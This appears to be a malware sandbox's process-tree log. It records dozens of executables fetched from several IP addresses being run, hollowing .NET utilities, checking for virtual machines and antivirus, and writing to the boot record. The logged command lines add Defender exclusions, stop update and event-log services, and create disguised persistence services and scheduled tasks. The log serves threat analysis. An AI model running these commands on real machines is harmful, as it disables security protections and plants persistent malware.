C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit4⤵PID:5684
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:7484
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:7732
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:1256
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"5⤵PID:5060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendvictor.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendvictor.exe.exe"3⤵
- Executes dropped EXE
PID:5420 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5420 -s 2764⤵
- Program crash
PID:5728
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfile.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfile.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5792 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"4⤵PID:5888
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend228.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend228.exe.exe"3⤵
- Executes dropped EXE
PID:8 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit4⤵PID:6124
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:5596
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:2344
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:1056
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"5⤵PID:5980
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendlook.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendlook.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5228 -
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendlook.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendlook.exe.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5272
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendlook.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendlook.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5256 -
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendlook.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendlook.exe.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5612
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendw.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendw.exe.exe"3⤵
- Executes dropped EXE
PID:6024 -
C:\Users\Admin\AppData\Local\Temp\s.exe"C:\Users\Admin\AppData\Local\Temp\s.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5252
-
-
-
C:\Users\Admin\AppData\Local\Temp\http106.166.173.36imgtest.exe.exe"C:\Users\Admin\AppData\Local\Temp\http106.166.173.36imgtest.exe.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5284 -
C:\Users\Admin\AppData\Local\Temp\http106.166.173.36imgtest.exe.exeC:\Users\Admin\AppData\Local\Temp\http106.166.173.36imgtest.exe.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3292 -
C:\Windows\system32\whoami.exewhoami5⤵PID:6576
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendswizzy.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendswizzy.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2468 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:6024
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendinstaller2.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendinstaller2.exe.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6064 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:3880
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:6756
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:1948
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:5000
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:5868
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:4508
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:6740 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:764
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵PID:6964
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵PID:2092
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵PID:2056
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵PID:6112
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:588
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WindowsAutHost"4⤵
- Launches sc.exe
PID:6224
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WindowsAutHost" binpath= "C:\ProgramData\WindowsServices\WindowsAutHost" start= "auto"4⤵
- Launches sc.exe
PID:5916
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:6988
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WindowsAutHost"4⤵
- Launches sc.exe
PID:7012 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfileosn.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfileosn.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5204 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:6316
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:6328
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:6336
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfile.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfile.exe.exe"3⤵
- Executes dropped EXE
PID:6408 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"4⤵PID:372
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendnn.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendnn.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6432 -
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendnn.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendnn.exe.exe"4⤵
- Executes dropped EXE
PID:6508
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendinstaller2.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendinstaller2.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6660
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfileosn.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfileosn.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6676 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:7020
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:6292 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:2284
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:1000
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp565.tmp"4⤵
- Creates scheduled task(s)
PID:3128
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe"4⤵PID:8144
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:7204
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'http77.91.77.82lendIerLRtXpEcMnUjz.exe.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:8028
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\cmd.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:6752
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'cmd.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:5800
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "cmd" /tr "C:\ProgramData\cmd.exe"5⤵
- Creates scheduled task(s)
PID:2080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lend1234.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lend1234.exe.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
PID:6308 -
C:\Users\Admin\AppData\Local\Temp\360TS_Setup.exe"C:\Users\Admin\AppData\Local\Temp\360TS_Setup.exe" /c:WW.Sam.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo=4⤵PID:7924
-
C:\Program Files (x86)\1718386031_0\360TS_Setup.exe"C:\Program Files (x86)\1718386031_0\360TS_Setup.exe" /c:WW.Sam.CPI202405 /pmode:2 /promo:eyJib290dGltZSI6IjMiLCJtZWRhbCI6IjMiLCJuZXdzIjoiMCIsIm9wZXJhIjoiMyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjMiLCJyZW1pbmRlciI6IjMiLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall5⤵PID:1560
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfud.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfud.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4708 -
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfud.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendfud.exe.exe"4⤵
- Executes dropped EXE
PID:6488
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendalex.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendalex.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5284 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:6828
-
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"5⤵
- Executes dropped EXE
PID:6844
-
-
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"5⤵
- Executes dropped EXE
PID:7080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendnn.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendnn.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5836 -
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendnn.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendnn.exe.exe"4⤵
- Executes dropped EXE
PID:6708
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendvictor.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendvictor.exe.exe"3⤵
- Executes dropped EXE
PID:5576 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 2724⤵
- Program crash
PID:6836
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend37.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend37.exe.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5704
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend27.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend27.exe.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3840
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendii.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendii.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5488 -
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendii.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendii.exe.exe"4⤵
- Executes dropped EXE
PID:6444
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfud.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfud.exe.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfud.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendfud.exe.exe"4⤵
- Executes dropped EXE
PID:5864
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendcleaner.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendcleaner.exe.exe"3⤵
- Executes dropped EXE
PID:6112 -
C:\Users\Admin\AppData\Roaming\ccleanerfile.exe"C:\Users\Admin\AppData\Roaming\ccleanerfile.exe"4⤵PID:1256
-
-
C:\Users\Admin\AppData\Roaming\XClient.exe"C:\Users\Admin\AppData\Roaming\XClient.exe"4⤵PID:6168
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendcleaner.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendcleaner.exe.exe"3⤵
- Executes dropped EXE
PID:764
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend1234.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lend1234.exe.exe"3⤵PID:6960
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendserver.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendserver.exe.exe"3⤵PID:6732
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendtime2time.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendtime2time.exe.exe"3⤵PID:6268
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendtime2time.exe.exe" -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:6676
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"4⤵PID:6768
-
C:\Users\Admin\Pictures\4a6pJNS6iQXMmgVhNs3Vzr8R.exe"C:\Users\Admin\Pictures\4a6pJNS6iQXMmgVhNs3Vzr8R.exe" /s5⤵PID:3540
-
-
C:\Users\Admin\Pictures\HE3F6e6Fp3FZQu3ThjZgDKrN.exe"C:\Users\Admin\Pictures\HE3F6e6Fp3FZQu3ThjZgDKrN.exe"5⤵PID:5744
-
-
C:\Users\Admin\Pictures\1FcFb1lNRlYY00H2GfBP3BNI.exe"C:\Users\Admin\Pictures\1FcFb1lNRlYY00H2GfBP3BNI.exe"5⤵PID:6256
-
-
C:\Users\Admin\Pictures\kSGEyICwvdcUPzkn7Whqvqpb.exe"C:\Users\Admin\Pictures\kSGEyICwvdcUPzkn7Whqvqpb.exe" /s5⤵PID:6804
-
C:\Users\Admin\Pictures\360TS_Setup.exe"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=6⤵PID:6504
-
C:\Program Files (x86)\1718386342_0\360TS_Setup.exe"C:\Program Files (x86)\1718386342_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall7⤵PID:7800
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendswizzy.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lendswizzy.exe.exe"3⤵
- Suspicious use of SetThreadContext
PID:6384 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:5132
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lend27.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.82lend27.exe.exe"3⤵PID:5880
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendtime2time.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendtime2time.exe.exe"3⤵PID:4844
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendtime2time.exe.exe" -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:5112
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"4⤵PID:4516
-
C:\Users\Admin\Pictures\8ApcCFSDKNJCAdtUjrMMWtgD.exe"C:\Users\Admin\Pictures\8ApcCFSDKNJCAdtUjrMMWtgD.exe" /s5⤵PID:7460
-
-
C:\Users\Admin\Pictures\ax6nFrZReY4gr2sWZzKLDFcw.exe"C:\Users\Admin\Pictures\ax6nFrZReY4gr2sWZzKLDFcw.exe"5⤵PID:2548
-
-
C:\Users\Admin\Pictures\2gbnEHcPp65H5WS0qEOZVug7.exe"C:\Users\Admin\Pictures\2gbnEHcPp65H5WS0qEOZVug7.exe"5⤵PID:2060
-
-
C:\Users\Admin\Pictures\djzptk7h0MJEWC1JJm1FrTc8.exe"C:\Users\Admin\Pictures\djzptk7h0MJEWC1JJm1FrTc8.exe" /s5⤵PID:7660
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"4⤵PID:596
-
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendIerLRtXpEcMnUjz.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendIerLRtXpEcMnUjz.exe.exe"3⤵PID:6924
-
-
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendii.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendii.exe.exe"3⤵
- Suspicious use of SetThreadContext
PID:5436 -
C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendii.exe.exe"C:\Users\Admin\AppData\Local\Temp\http77.91.77.81lendii.exe.exe"4⤵PID:6208
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5336
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"2⤵PID:5824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }2⤵PID:7044
-
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe2⤵PID:2380
-
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5052
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:1380
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5476
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:6444
-
C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"1⤵PID:6984
-
C:\ProgramData\WindowsServices\WindowsAutHostC:\ProgramData\WindowsServices\WindowsAutHost1⤵PID:5648
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:5756
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2808
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:6584
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵PID:5648
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:2940
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:2100
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵PID:8124
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exeC:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe1⤵PID:7912
-
C:\ProgramData\cmd.exeC:\ProgramData\cmd.exe1⤵PID:5300
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\cmd.exe"2⤵
- Command and Scripting Interpreter: PowerShell
PID:7668
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"2⤵
- Command and Scripting Interpreter: PowerShell
PID:6072
-
-
